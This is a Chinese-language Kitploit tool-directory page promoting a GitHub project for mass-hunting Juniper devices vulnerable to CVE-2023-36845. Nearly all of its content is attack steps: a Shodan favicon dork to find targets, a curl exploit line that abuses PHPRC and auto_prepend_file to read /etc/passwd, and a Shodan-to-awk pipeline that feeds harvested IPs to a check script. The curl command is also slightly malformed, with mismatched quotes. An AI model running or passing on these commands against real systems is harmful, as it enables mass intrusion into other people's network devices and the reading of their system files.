Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Juniper-CVE-2023-36845-Mass-Hunting — Juniper RCE(远程代码执行)CVE-2023-36845 是 Juniper 软件中发现的一个漏洞。该漏洞允许远程代码执行,意味着攻击者可以在无需物理访问设备的情况下在系统上运行任意代码。 | Kitploit
工具/GitHubGitHub/jahithoque/juniper-cve-2023-36845-mass-hunting
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubjahithoque/juniper-cve-2023-36845-mass-hunting

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE(远程代码执行)CVE-2023-36845 是 Juniper 软件中发现的一个漏洞。该漏洞允许远程代码执行,意味着攻击者可以在无需物理访问设备的情况下在系统上运行任意代码。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
122年前尚未审核

Juniper-CVE-2023-36845-批量搜索

Juniper RCE(远程代码执行)CVE-2023-36845 是 Juniper 软件中发现的一个漏洞。该缺陷允许远程代码执行,意味着攻击者可以在无需物理访问设备的情况下在系统上运行任意代码。

如何查找:

Shodan dork:http.favicon.hash:2141724739

配合其他相关 dork(如 SSL 证书、组织名称等)使用,可进行更有针对性的搜索。

针对单个主机的利用:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

自动化:

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #从 shodan 下载

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt IMAGE

下载工具